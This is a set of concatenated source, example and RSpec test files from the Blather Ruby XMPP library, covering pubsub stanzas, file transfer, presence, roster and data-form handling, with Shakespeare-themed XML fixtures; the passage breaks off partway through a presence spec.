# Fixture: an outgoing set IQ retracting (deleting) a single published
# item from the 'princely_musings' node.
def retract_xml
<<-NODE
<iq type='set'
from='<EMAIL>/elsinore'
to='pubsub.shakespeare.lit'
id='retract1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<retract node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'/>
</retract>
</pubsub>
</iq>
NODE
end
<file_sep>/examples/ping_pong.rb
# Example: two Blather DSL clients ("Ping" and "Pong") sharing one
# EventMachine reactor, bouncing chat messages back and forth forever.
require 'rubygems'
require 'blather/client/dsl'
# Flush stdout immediately so the ping!/pong! trace appears in real time.
$stdout.sync = true
module Ping
extend Blather::DSL
def self.run; client.run; end
setup '<EMAIL>', '<PASSWORD>'
# Serve the first ball: when the pong bot's presence is seen, send 'ping'.
status :from => /pong@your\.jabber\.server/ do |s|
puts "serve!"
say s.from, 'ping'
end
# Answer every 'pong' chat message with another 'ping'.
message :chat?, :body => 'pong' do |m|
puts "ping!"
say m.from, 'ping'
end
end
module Pong
extend Blather::DSL
def self.run; client.run; end
setup '<EMAIL>', '<PASSWORD>'
# Answer every 'ping' chat message with a 'pong'.
message :chat?, :body => 'ping' do |m|
puts "pong!"
say m.from, 'pong'
end
end
# Stop the reactor (and with it both clients) cleanly on Ctrl-C or TERM.
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }
EM.run do
Ping.run
Pong.run
end
<file_sep>/lib/blather/stanza/pubsub/subscriptions.rb
module Blather
class Stanza
class PubSub

  # # PubSub Subscriptions Stanza
  #
  # [XEP-0060 Section 5.6 Retrieve Subscriptions](http://xmpp.org/extensions/xep-0060.html#entity-subscriptions)
  #
  # @handler :pubsub_subscriptions
  class Subscriptions < PubSub
    register :pubsub_subscriptions, :subscriptions, self.registered_ns

    include Enumerable
    alias_method :find, :xpath

    # Overrides the parent to ensure a subscriptions node is created
    # @private
    def self.new(type = nil, host = nil)
      stanza = super type
      stanza.to = host
      stanza.subscriptions
      stanza
    end

    # Overrides the parent to ensure the subscriptions node is destroyed
    # @private
    def inherit(node)
      subscriptions.remove
      super
    end

    # Get or create the actual subscriptions node
    #
    # @return [Blather::XMPPNode]
    def subscriptions
      found = pubsub.find_first('ns:subscriptions', :ns => self.class.registered_ns)
      return found if found
      created = XMPPNode.new('subscriptions', self.document)
      self.pubsub << created
      created
    end

    # Iterate over the list of subscriptions
    #
    # @yieldparam [Hash] subscription
    # @see {#list}
    def each(&block)
      list.each(&block)
    end

    # Get the size of the subscriptions list
    #
    # @return [Fixnum]
    def size
      list.size
    end

    # Get a hash of subscriptions keyed by subscription state
    # (e.g. :subscribed, :unconfigured, :pending, :none), where each value
    # is an array of {:node => ..., :jid => ...} hashes, plus :subid when
    # the server provided one.
    #
    # @return [Hash]
    def list
      found = subscriptions.find('//ns:subscription', :ns => self.class.registered_ns)
      found.each_with_object({}) do |item, acc|
        entry = { :node => item[:node], :jid => item[:jid] }
        entry[:subid] = item[:subid] if item[:subid]
        (acc[item[:subscription].to_sym] ||= []) << entry
      end
    end
  end # Subscriptions
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/file_transfer.rb
module Blather
# File Transfer helper
# Takes care of accepting, declining and offering file transfers through the stream
class FileTransfer
# Set this to false if you don't want to use In-Band Bytestreams
attr_accessor :allow_ibb
# Set this to false if you don't want to use SOCKS5 Bytestreams
attr_accessor :allow_s5b
# Set this to true if you want SOCKS5 Bytestreams to attempt to use private network addresses
attr_accessor :allow_private_ips
# Create a new FileTransfer
#
# @param [Blather::Stream] stream the stream the file transfer should use
# @param [Blather::Stanza::Iq::Si] iq a si iq used to stream-initiation
def initialize(stream, iq = nil)
@stream = stream
# Both transports are allowed by default; #accept prefers S5B over IBB.
@allow_s5b = true
@allow_ibb = true
Blather.logger.debug "File transfers on the local network are ignored by default. Set #allow_private_ips = true if you need local network file transfers."
@iq = iq
end
# Accept an incoming file-transfer
#
# Replies to the stream-initiation offer with a submitted feature-negotiation
# form selecting one stream method, then registers a one-shot handler that
# hands the subsequent bytestream-open IQ to the matching transport class.
#
# @param [module] handler the handler for incoming data, see Blather::FileTransfer::SimpleFileReceiver for an example
# @param [Array] params the params to be passed into the handler
def accept(handler, *params)
answer = @iq.reply
answer.si.feature.x.type = :submit
# Stream methods the initiator offered in the SI feature-negotiation form.
supported_methods = @iq.si.feature.x.field("stream-method").options.map(&:value)
# Prefer SOCKS5 Bytestreams when offered and allowed; fall back to IBB.
if supported_methods.include?(Stanza::Iq::S5b::NS_S5B) and @allow_s5b
answer.si.feature.x.fields = {:var => 'stream-method', :value => Stanza::Iq::S5b::NS_S5B}
@stream.register_handler :s5b_open, :from => @iq.from do |iq|
transfer = Blather::FileTransfer::S5b.new(@stream, iq)
transfer.allow_ibb_fallback = true if @allow_ibb
transfer.allow_private_ips = true if @allow_private_ips
# Defer the accept so the handler returns (and is consumed) first.
EM.next_tick { transfer.accept(handler, *params) }
true
end
@stream.write answer
elsif supported_methods.include?(Stanza::Iq::Ibb::NS_IBB) and @allow_ibb
answer.si.feature.x.fields = {:var => 'stream-method', :value => Stanza::Iq::Ibb::NS_IBB}
@stream.register_handler :ibb_open, :from => @iq.from do |iq|
transfer = Blather::FileTransfer::Ibb.new(@stream, iq)
EM.next_tick { transfer.accept(handler, *params) }
true
end
@stream.write answer
else
# None of the offered methods is allowed: reject the offer with a
# bad-request error carrying the SI <no-valid-streams/> condition.
reason = XMPPNode.new('no-valid-streams')
reason.namespace = Blather::Stanza::Iq::Si::NS_SI
@stream.write StanzaError.new(@iq, 'bad-request', 'cancel', nil, [reason]).to_node
end
end
# Decline an incoming file-transfer by answering with a forbidden error
def decline
answer = StanzaError.new(@iq, 'forbidden', 'cancel', 'Offer declined').to_node
@stream.write answer
end
# Offer a file to somebody, not implemented yet
def offer
# TODO: implement
end
# Simple handler for incoming file transfers
#
# You can define your own handler and pass it to the accept method.
module SimpleFileReceiver
# @param [String] path where the received file will be written
# @param [Integer] size the expected total byte count of the transfer
def initialize(path, size)
@path = path
@size = size
@transferred = 0
end
# @private
def post_init
# NOTE(review): opens in text mode ("w"); binary transfers on platforms
# that distinguish text/binary may want "wb" -- confirm before changing.
@file = File.open(@path, "w")
end
# @private
def receive_data(data)
@transferred += data.size
@file.write data
end
# @private
def unbind
@file.close
# Discard partial downloads: keep the file only if every byte arrived.
File.delete(@path) unless @transferred == @size
end
end
end
end
<file_sep>/spec/blather/stanza/x_spec.rb
require 'spec_helper'
# Fixture: a jabber:x:data form with three text-single fields and one
# list-multi field that carries desc/required/value/option children.
def x_xml
<<-XML
<x xmlns='jabber:x:data'
type='form'>
<title/>
<instructions/>
<field var='field-name'
type='text-single'
label='description' />
<field var='field-name2'
type='text-single'
label='description' />
<field var='field-name3'
type='text-single'
label='description' />
<field var='field-name4'
type='list-multi'
label='description'>
<desc/>
<required/>
<value>field-value4</value>
<option label='option-label'><value>option-value</value></option>
<option label='option-label'><value>option-value</value></option>
</field>
</x>
XML
end
# Specs for the jabber:x:data form stanza: construction, type/title/
# instructions attributes (including XML escaping), and field handling.
describe Blather::Stanza::X do
it 'can be created from an XML string' do
x = Blather::Stanza::X.new parse_stanza(x_xml).root
expect(x.type).to eq(:form)
expect(x).to be_instance_of Blather::Stanza::X
end
# The four form types defined by XEP-0004 data forms.
[:cancel, :form, :result, :submit].each do |type|
it "type can be set as \"#{type}\"" do
x = Blather::Stanza::X.new type
expect(x.type).to eq(type)
end
end
it 'is constructed properly' do
n = Blather::Stanza::X.new :form
expect(n.find("/ns:x[@type='form']", :ns => Blather::Stanza::X.registered_ns)).not_to be_empty
end
it 'has an action attribute' do
n = Blather::Stanza::X.new :form
expect(n.type).to eq(:form)
n.type = :submit
expect(n.type).to eq(:submit)
end
it 'has a title attribute' do
n = Blather::Stanza::X.new :form
expect(n.title).to eq(nil)
n.title = "Hello World!"
expect(n.title).to eq("Hello World!")
n.title = "goodbye"
expect(n.title).to eq("goodbye")
end
it 'escapes title properly' do
n = Blather::Stanza::X.new :form
expect(n.title).to eq(nil)
n.title = "<a&a>"
expect(n.title).to eq("<a&a>")
end
it 'has an instructions attribute' do
n = Blather::Stanza::X.new :form
expect(n.instructions).to eq(nil)
n.instructions = "Please fill in this form"
expect(n.instructions).to eq("Please fill in this form")
n.instructions = "goodbye"
expect(n.instructions).to eq("goodbye")
end
it 'escapes instructions properly' do
n = Blather::Stanza::X.new :form
expect(n.instructions).to eq(nil)
n.instructions = "<a&a>"
expect(n.instructions).to eq("<a&a>")
end
it 'inherits a list of fields' do
n = Blather::Stanza::Iq::Command.new
n.command << parse_stanza(x_xml).root
r = Blather::Stanza::X.new.inherit n.form
expect(r.fields.size).to eq(4)
expect(r.fields.map { |f| f.class }.uniq).to eq([Blather::Stanza::X::Field])
end
it 'returns a field object for a particular var' do
x = Blather::Stanza::X.new parse_stanza(x_xml).root
f = x.field 'field-name4'
expect(f).to be_instance_of Blather::Stanza::X::Field
expect(f.value).to eq('field-value4')
end
# The fields= setter accepts hashes, Field objects, or a mix of both.
it 'takes a list of hashes for fields' do
fields = [
{:label => 'label', :type => 'text-single', :var => 'var'},
{:label => 'label1', :type => 'text-single', :var => 'var1'},
]
control = [ Blather::Stanza::X::Field.new(*%w[var text-single label]),
Blather::Stanza::X::Field.new(*%w[var1 text-single label1])]
di = Blather::Stanza::X.new nil, fields
expect(di.fields.size).to eq(2)
di.fields.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'takes a list of Field objects as fields' do
control = [ Blather::Stanza::X::Field.new(*%w[var text-single label1]),
Blather::Stanza::X::Field.new(*%w[var1 text-single label1])]
di = Blather::Stanza::X.new nil, control
expect(di.fields.size).to eq(2)
di.fields.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'takes a mix of hashes and field objects as fields' do
fields = [
{:label => 'label', :type => 'text-single', :var => 'var'},
Blather::Stanza::X::Field.new(*%w[var1 text-single label1]),
]
control = [ Blather::Stanza::X::Field.new(*%w[var text-single label]),
Blather::Stanza::X::Field.new(*%w[var1 text-single label1])]
di = Blather::Stanza::X.new nil, fields
expect(di.fields.size).to eq(2)
di.fields.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'allows adding of fields' do
di = Blather::Stanza::X.new nil
expect(di.fields.size).to eq(0)
di.fields = [{:label => 'label', :type => 'text-single', :var => 'var', :required => true}]
expect(di.fields.size).to eq(1)
di.fields += [Blather::Stanza::X::Field.new(*%w[var1 text-single label1])]
expect(di.fields.size).to eq(2)
end
end
# Specs for a single data-form field: namespace, node inheritance, the
# type/var/label/desc/required/value attributes, options, and equality.
describe Blather::Stanza::X::Field do
subject { Blather::Stanza::X::Field.new nil }
it "should have the namespace 'jabber:x:data'" do
expect(subject.namespace.href).to eq('jabber:x:data')
end
it 'will auto-inherit nodes' do
n = parse_stanza "<field type='text-single' var='music' label='Music from the time of Shakespeare' />"
i = Blather::Stanza::X::Field.new n.root
expect(i.type).to eq('text-single')
expect(i.var).to eq('music')
expect(i.label).to eq('Music from the time of Shakespeare')
end
it 'has a type attribute' do
n = Blather::Stanza::X::Field.new 'var', 'text-single'
expect(n.type).to eq('text-single')
n.type = 'hidden'
expect(n.type).to eq('hidden')
end
it 'has a var attribute' do
n = Blather::Stanza::X::Field.new 'name', 'text-single'
expect(n.var).to eq('name')
n.var = 'email'
expect(n.var).to eq('email')
end
it 'has a label attribute' do
n = Blather::Stanza::X::Field.new 'subject', 'text-single', 'Music from the time of Shakespeare'
expect(n.label).to eq('Music from the time of Shakespeare')
n.label = 'Books by and about Shakespeare'
expect(n.label).to eq('Books by and about Shakespeare')
end
it 'has a desc attribute' do
n = Blather::Stanza::X::Field.new 'subject', 'text-single', 'Music from the time of Shakespeare'
expect(n.desc).to eq(nil)
n.desc = 'Books by and about Shakespeare'
expect(n.desc).to eq('Books by and about Shakespeare')
n.desc = 'goodbye'
expect(n.desc).to eq('goodbye')
end
it 'has a required? attribute' do
n = Blather::Stanza::X::Field.new 'subject', 'text-single', 'Music from the time of Shakespeare'
expect(n.required?).to eq(false)
n.required = true
expect(n.required?).to eq(true)
n.required = false
expect(n.required?).to eq(false)
end
it 'has a value attribute' do
n = Blather::Stanza::X::Field.new 'subject', 'text-single', 'Music from the time of Shakespeare'
expect(n.value).to eq(nil)
n.value = 'book1'
expect(n.value).to eq('book1')
n.value = 'book2'
expect(n.value).to eq('book2')
end
# list-multi fields accept an array of values rather than a single one.
it 'allows multiple values' do
n = Blather::Stanza::X::Field.new 'subject', 'list-multi', 'Music from the time of Shakespeare'
expect(n.value).to eq(nil)
n.value = ['book<&1>', 'book2']
expect(n.value).to eq(['book<&1>', 'book2'])
end
it 'allows setting options' do
di = Blather::Stanza::X::Field.new nil
expect(di.options.size).to eq(0)
di.options = [{:label => 'Person', :value => 'person'}, Blather::Stanza::X::Field::Option.new(*%w[person1 Person1])]
expect(di.options.size).to eq(2)
end
it 'can determine equality' do
a = Blather::Stanza::X::Field.new('subject', 'text-single')
expect(a).to eq(Blather::Stanza::X::Field.new('subject', 'text-single'))
expect(a).not_to equal Blather::Stanza::X::Field.new('subject1', 'text-single')
end
end
# Specs for a form field's <option/> child: its value and label accessors.
describe Blather::Stanza::X::Field::Option do
it 'has a value attribute' do
n = Blather::Stanza::X::Field::Option.new 'person1', 'Person 1'
expect(n.value).to eq('person1')
n.value = 'book1'
expect(n.value).to eq('book1')
end
it 'has a label attribute' do
n = Blather::Stanza::X::Field::Option.new 'person1', 'Person 1'
expect(n.label).to eq('Person 1')
n.label = 'Book 1'
expect(n.label).to eq('Book 1')
n.label = 'Book 2'
expect(n.label).to eq('Book 2')
end
end
<file_sep>/spec/blather/stanza/presence/status_spec.rb
require 'spec_helper'
# Specs for presence status stanzas: parsing, state/message/priority
# accessors with validation, priority-based comparison, and the
# per-state helper predicates (away?, chat?, ...).
describe Blather::Stanza::Presence::Status do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:status, nil)).to eq(Blather::Stanza::Presence::Status)
end
it 'must be importable as unavailable' do
expect(Blather::XMPPNode.parse('<presence type="unavailable"/>')).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
end
it 'must be importable as nil' do
expect(Blather::XMPPNode.parse('<presence/>')).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
end
it 'must be importable with show, status and priority children' do
n = Blather::XMPPNode.parse <<-XML
<presence from='<EMAIL>/globe'>
<show>chat</show>
<status>Talk to me!</status>
<priority>10</priority>
</presence>
XML
expect(n).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
expect(n.state).to eq(:chat)
expect(n.message).to eq('Talk to me!')
expect(n.priority).to eq(10)
end
it 'can set state on creation' do
status = Blather::Stanza::Presence::Status.new :away
expect(status.state).to eq(:away)
end
it 'can set a message on creation' do
status = Blather::Stanza::Presence::Status.new nil, 'Say hello!'
expect(status.message).to eq('Say hello!')
end
it 'ensures type is nil or :unavailable' do
status = Blather::Stanza::Presence::Status.new
expect { status.type = :invalid_type_name }.to raise_error(Blather::ArgumentError)
[nil, :unavailable].each do |valid_type|
status.type = valid_type
expect(status.type).to eq(valid_type)
end
end
it 'ensures state is one of Presence::Status::VALID_STATES' do
status = Blather::Stanza::Presence::Status.new
expect { status.state = :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::Presence::Status::VALID_STATES.each do |valid_state|
status.state = valid_state
expect(status.state).to eq(valid_state)
end
end
it 'returns :available if state is nil' do
expect(Blather::Stanza::Presence::Status.new.state).to eq(:available)
end
it 'returns :available if <show/> is blank' do
status = Blather::XMPPNode.parse(<<-NODE)
<presence><show/></presence>
NODE
expect(status.state).to eq(:available)
end
it 'returns :unavailable if type is :unavailable' do
status = Blather::Stanza::Presence::Status.new
status.type = :unavailable
expect(status.state).to eq(:unavailable)
end
# XMPP priority is a signed byte: valid range is -128..127.
it 'ensures priority is not greater than 127' do
expect { Blather::Stanza::Presence::Status.new.priority = 128 }.to raise_error(Blather::ArgumentError)
end
it 'ensures priority is not less than -128' do
expect { Blather::Stanza::Presence::Status.new.priority = -129 }.to raise_error(Blather::ArgumentError)
end
it 'has "attr_accessor" for priority' do
status = Blather::Stanza::Presence::Status.new
expect(status.priority).to eq(0)
status.priority = 10
expect(status.children.detect { |n| n.element_name == 'priority' }).not_to be_nil
expect(status.priority).to eq(10)
end
it 'has "attr_accessor" for message' do
status = Blather::Stanza::Presence::Status.new
expect(status.message).to be_nil
status.message = 'new message'
expect(status.children.detect { |n| n.element_name == 'status' }).not_to be_nil
expect(status.message).to eq('new message')
end
it 'must be comparable by priority' do
jid = Blather::JID.new 'a@b/c'
status1 = Blather::Stanza::Presence::Status.new
status1.from = jid
status2 = Blather::Stanza::Presence::Status.new
status2.from = jid
status1.priority = 1
status2.priority = -1
expect(status1 <=> status2).to eq(1)
expect(status2 <=> status1).to eq(-1)
status2.priority = 1
expect(status1 <=> status2).to eq(0)
end
it 'must should sort by status if priorities are equal' do
jid = Blather::JID.new 'a@b/c'
status1 = Blather::Stanza::Presence::Status.new :away
status1.from = jid
status2 = Blather::Stanza::Presence::Status.new :available
status2.from = jid
status1.priority = status2.priority = 1
expect(status1 <=> status2).to eq(-1)
expect(status2 <=> status1).to eq(1)
end
# Comparison is only defined between statuses of the same bare resource.
it 'raises an argument error if compared to a status with a different Blather::JID' do
status1 = Blather::Stanza::Presence::Status.new
status1.from = 'a@b/c'
status2 = Blather::Stanza::Presence::Status.new
status2.from = 'd@e/f'
expect { status1 <=> status2 }.to raise_error(Blather::ArgumentError)
end
([:available] + Blather::Stanza::Presence::Status::VALID_STATES).each do |valid_state|
it "provides a helper (#{valid_state}?) for state #{valid_state}" do
expect(Blather::Stanza::Presence::Status.new).to respond_to :"#{valid_state}?"
end
it "returns true on call to (#{valid_state}?) if state == #{valid_state}" do
method = "#{valid_state}?".to_sym
stat = Blather::Stanza::Presence::Status.new
stat.state = valid_state
expect(stat).to respond_to method
expect(stat.__send__(method)).to eq(true)
end
end
end
<file_sep>/spec/blather/stanza/iq/roster_spec.rb
require 'spec_helper'
# Fixture: a jabber:iq:roster result IQ with a roster version attribute
# and three contacts, each filed under the 'Friends' group.
def roster_xml
<<-XML
<iq to='<EMAIL>/balcony' type='result' id='roster_1'>
<query xmlns='jabber:iq:roster' ver='3bb607aa4fa0bc9e'>
<item jid='<EMAIL>'
name='Romeo'
subscription='both'>
<group>Friends</group>
</item>
<item jid='<EMAIL>'
name='Mercutio'
subscription='from'>
<group>Friends</group>
</item>
<item jid='<EMAIL>'
name='Benvolio'
subscription='both'>
<group>Friends</group>
</item>
</query>
</iq>
XML
end
# Specs for the roster IQ stanza: registration, item inheritance as
# RosterItem objects, import, and the roster version attribute.
describe Blather::Stanza::Iq::Roster do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:query, 'jabber:iq:roster')).to eq(Blather::Stanza::Iq::Roster)
end
it 'ensures newly inherited items are RosterItem objects' do
n = parse_stanza roster_xml
r = Blather::Stanza::Iq::Roster.new.inherit n.root
expect(r.items.map { |i| i.class }.uniq).to eq([Blather::Stanza::Iq::Roster::RosterItem])
end
it 'can be created with #import' do
expect(Blather::XMPPNode.parse(roster_xml)).to be_instance_of Blather::Stanza::Iq::Roster
end
it 'retrieves version' do
n = parse_stanza roster_xml
r = Blather::Stanza::Iq::Roster.new.inherit n.root
expect(r.version).to eq '3bb607aa4fa0bc9e'
end
end
# Specs for a single roster entry: the various constructor forms
# (positional args, hash, node), group helpers, stanza conversion, and
# the jid/name/subscription/ask accessors.
describe Blather::Stanza::Iq::Roster::RosterItem do
# Note: stored JIDs are stripped of their resource part.
it 'can be initialized with just a Blather::JID' do
i = Blather::Stanza::Iq::Roster::RosterItem.new 'n@d/r'
expect(i.jid).to eq(Blather::JID.new('n@d/r').stripped)
end
it 'can be initialized with a name' do
i = Blather::Stanza::Iq::Roster::RosterItem.new nil, 'foobar'
expect(i.name).to eq('foobar')
end
it 'can be initialized with a subscription' do
i = Blather::Stanza::Iq::Roster::RosterItem.new nil, nil, :both
expect(i.subscription).to eq(:both)
end
it 'can be initialized with ask (subscription sub-type)' do
i = Blather::Stanza::Iq::Roster::RosterItem.new nil, nil, nil, :subscribe
expect(i.ask).to eq(:subscribe)
end
it 'can be initailized with a hash' do
control = { :jid => 'j@d/r',
:name => 'name',
:subscription => :both,
:ask => :subscribe }
i = Blather::Stanza::Iq::Roster::RosterItem.new control
expect(i.jid).to eq(Blather::JID.new(control[:jid]).stripped)
expect(i.name).to eq(control[:name])
expect(i.subscription).to eq(control[:subscription])
expect(i.ask).to eq(control[:ask])
end
it 'inherits a node when initialized with one' do
n = Blather::XMPPNode.new 'item'
n[:jid] = 'n@d/r'
n[:subscription] = 'both'
i = Blather::Stanza::Iq::Roster::RosterItem.new n
expect(i.jid).to eq(Blather::JID.new('n@d/r'))
expect(i.subscription).to eq(:both)
end
it 'has a #groups helper that gives an array of groups' do
n = parse_stanza "<item jid='<EMAIL>' subscription='both'><group>foo</group><group>bar</group><group>baz</group></item>"
i = Blather::Stanza::Iq::Roster::RosterItem.new n.root
expect(i).to respond_to :groups
expect(i.groups.sort).to eq(%w[bar baz foo])
end
it 'has a helper to set the groups' do
n = parse_stanza "<item jid='<EMAIL>' subscription='both'><group>foo</group><group>bar</group><group>baz</group></item>"
i = Blather::Stanza::Iq::Roster::RosterItem.new n.root
expect(i).to respond_to :groups=
expect(i.groups.sort).to eq(%w[bar baz foo])
i.groups = %w[a b c]
expect(i.groups.sort).to eq(%w[a b c])
end
# #to_stanza wraps the lone item in a full Roster IQ.
it 'can be easily converted into a proper stanza' do
xml = "<item jid='<EMAIL>' subscription='both'><group>foo</group><group>bar</group><group>baz</group></item>"
n = parse_stanza xml
i = Blather::Stanza::Iq::Roster::RosterItem.new n.root
expect(i).to respond_to :to_stanza
s = i.to_stanza
expect(s).to be_kind_of Blather::Stanza::Iq::Roster
expect(s.items.first.jid).to eq(Blather::JID.new('<EMAIL>'))
expect(s.items.first.groups.sort).to eq(%w[bar baz foo])
end
it 'has an "attr_accessor" for jid' do
i = Blather::Stanza::Iq::Roster::RosterItem.new
expect(i).to respond_to :jid
expect(i.jid).to be_nil
expect(i).to respond_to :jid=
i.jid = 'n@d/r'
expect(i.jid).to eq(Blather::JID.new('n@d/r').stripped)
end
it 'has a name attribute' do
i = Blather::Stanza::Iq::Roster::RosterItem.new
i.name = 'name'
expect(i.name).to eq('name')
end
it 'has a subscription attribute' do
i = Blather::Stanza::Iq::Roster::RosterItem.new
i.subscription = :both
expect(i.subscription).to eq(:both)
end
it 'has an ask attribute' do
i = Blather::Stanza::Iq::Roster::RosterItem.new
i.ask = :subscribe
expect(i.ask).to eq(:subscribe)
end
end
<file_sep>/lib/blather/stanza/pubsub/unsubscribe.rb
module Blather
class Stanza
class PubSub
# # PubSub Unsubscribe Stanza
#
# [XEP-0060 Section 6.2 - Unsubscribe from a Node](http://xmpp.org/extensions/xep-0060.html#subscriber-unsubscribe)
#
# @handler :pubsub_unsubscribe
class Unsubscribe < PubSub
register :pubsub_unsubscribe, :unsubscribe, self.registered_ns
# Create a new unsubscribe node
#
# @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
# @param [String] host the host to send the request to
# @param [String] node the node to unsubscribe from
# @param [Blather::JID, #to_s] jid the JID of the unsubscription
# @param [String] subid the subscription ID of the unsubscription
def self.new(type = :set, host = nil, node = nil, jid = nil, subid = nil)
new_node = super(type, host)
new_node.node = node
new_node.jid = jid
new_node.subid = subid
new_node
end
# Get the JID of the unsubscription
#
# @return [Blather::JID]
def jid
JID.new(unsubscribe[:jid])
end
# Set the JID of the unsubscription
#
# @param [Blather::JID, #to_s] jid
def jid=(jid)
unsubscribe[:jid] = jid
end
# Get the name of the node to unsubscribe from
#
# @return [String]
def node
unsubscribe[:node]
end
# Set the name of the node to unsubscribe from
#
# @param [String] node
def node=(node)
unsubscribe[:node] = node
end
# Get the subscription ID to unsubscribe from
#
# @return [String]
def subid
unsubscribe[:subid]
end
# Set the subscription ID to unsubscribe from
#
# @param [String] subid
def subid=(subid)
unsubscribe[:subid] = subid
end
# Get or create the actual unsubscribe node
#
# Lazily appends an <unsubscribe/> child (in the pubsub namespace) to
# the <pubsub/> element the first time it is needed.
#
# @return [Blather::XMPPNode]
def unsubscribe
unless unsubscribe = pubsub.find_first('ns:unsubscribe', :ns => self.class.registered_ns)
self.pubsub << (unsubscribe = XMPPNode.new('unsubscribe', self.document))
unsubscribe.namespace = self.pubsub.namespace
end
unsubscribe
end
end # Unsubscribe
end # PubSub
end # Stanza
end # Blather
<file_sep>/Rakefile
# -*- ruby -*-
# Build tasks for the Blather gem: spec runs, gem packaging, YARD docs.
# Put lib/ext/bin/spec on the load path of any spawned Ruby process.
ENV['RUBY_FLAGS'] = "-I#{%w(lib ext bin spec).join(File::PATH_SEPARATOR)}"
require 'rubygems'
require 'bundler/gem_tasks'
require 'bundler/setup'
# Both `rake` and `rake test` run the RSpec suite.
task :default => :spec
task :test => :spec
require 'rspec/core/rake_task'
RSpec::Core::RakeTask.new
require 'yard'
# Register the custom @handler YARD tag used throughout the stanza classes.
YARD::Tags::Library.define_tag 'Blather handler', :handler, :with_name
YARD::Templates::Engine.register_template_path 'yard/templates'
# `rake doc` generates markdown-formatted API docs into ./doc/public/yard.
YARD::Rake::YardocTask.new(:doc) do |t|
t.options = ['--no-private', '-m', 'markdown', '-o', './doc/public/yard']
end
<file_sep>/spec/blather/stanza/presence_spec.rb
require 'spec_helper'
# Specs for Blather::Stanza::Presence: registration, importing, type
# validation, and the decorator modules (C, Status, Subscription, MUC,
# MUCUser) that get mixed in based on the presence stanza's children/type.
describe Blather::Stanza::Presence do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:presence, nil)).to eq(Blather::Stanza::Presence)
end
it 'must be importable' do
expect(Blather::XMPPNode.parse('<presence type="probe"/>')).to be_instance_of Blather::Stanza::Presence
end
it 'ensures type is one of Blather::Stanza::Presence::VALID_TYPES' do
presence = Blather::Stanza::Presence.new
expect { presence.type = :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::Presence::VALID_TYPES.each do |valid_type|
presence.type = valid_type
expect(presence.type).to eq(valid_type)
end
end
# Each valid type gets a predicate helper, e.g. #subscribe? for :subscribe.
Blather::Stanza::Presence::VALID_TYPES.each do |valid_type|
it "provides a helper (#{valid_type}?) for type #{valid_type}" do
expect(Blather::Stanza::Presence.new).to respond_to :"#{valid_type}?"
end
it "returns true on call to (#{valid_type}?) if type == #{valid_type}" do
method = "#{valid_type}?".to_sym
pres = Blather::Stanza::Presence.new
pres.type = valid_type
expect(pres).to respond_to method
expect(pres.__send__(method)).to eq(true)
end
end
it 'creates a C object when importing a node with a c child' do
string = <<-XML
<presence from='<EMAIL>/globe'>
<c xmlns='http://jabber.org/protocol/caps'
hash='sha-1'
node='http://www.chatopus.com'
ver='zHyEOgxTrkpSdGcQKH8EFPLsriY='/>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s).to be_kind_of Blather::Stanza::Presence::C::InstanceMethods
expect(s.node).to eq('http://www.chatopus.com')
expect(s.handler_hierarchy).to include(:c)
end
it 'creates a Status object when importing a node with type == nil' do
s = Blather::Stanza::Presence.parse('<presence/>')
expect(s).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
expect(s.state).to eq(:available)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::Status.registered_name.to_sym)
end
it 'creates a Status object when importing a node with type == "unavailable"' do
s = Blather::Stanza::Presence.parse('<presence type="unavailable"/>')
expect(s).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
expect(s.state).to eq(:unavailable)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::Status.registered_name.to_sym)
end
it 'creates a Subscription object when importing a node with type == "subscribe"' do
s = Blather::Stanza::Presence.parse('<presence type="subscribe"/>')
expect(s).to be_kind_of Blather::Stanza::Presence::Subscription::InstanceMethods
expect(s.type).to eq(:subscribe)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::Subscription.registered_name.to_sym)
end
it 'creates a MUC object when importing a node with a form in the MUC namespace' do
string = <<-XML
<presence from='<EMAIL>/globe'>
<x xmlns='http://jabber.org/protocol/muc'/>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s).to be_kind_of Blather::Stanza::Presence::MUC::InstanceMethods
end
it 'creates a MUCUser object when importing a node with a form in the MUC#user namespace' do
string = <<-XML
<presence from='<EMAIL>/globe'>
<x xmlns='http://jabber.org/protocol/muc#user'/>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s).to be_kind_of Blather::Stanza::Presence::MUCUser::InstanceMethods
end
# Unknown types are preserved as-is rather than raising on import.
it 'creates a Presence object when importing a node with type equal to something unknown' do
string = "<presence from='<EMAIL>/globe' type='foo'/>"
s = Blather::Stanza::Presence.parse string
expect(s).to be_kind_of Blather::Stanza::Presence
expect(s.type).to eq(:foo)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence.registered_name.to_sym)
end
# Multiple decorator modules can be mixed into the same stanza instance.
it 'behaves like a C, a Status, and a MUCUser when all types of children are present' do
string = <<-XML
<presence from='<EMAIL>@shakes<EMAIL>.lit/globe'>
<show>chat</show>
<c xmlns='http://jabber.org/protocol/caps'
hash='sha-1'
node='http://www.chatopus.com'
ver='zHyEOgxTrkpSdGcQKH8EFPLsriY='/>
<x xmlns='http://jabber.org/protocol/muc#user'>
<item affiliation='none'
jid='<EMAIL>/pda'
role='participant'/>
<status code='100'/>
<status code='110'/>
<password><PASSWORD>>
</x>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s.state).to eq(:chat)
expect(s.node).to eq('http://www.chatopus.com')
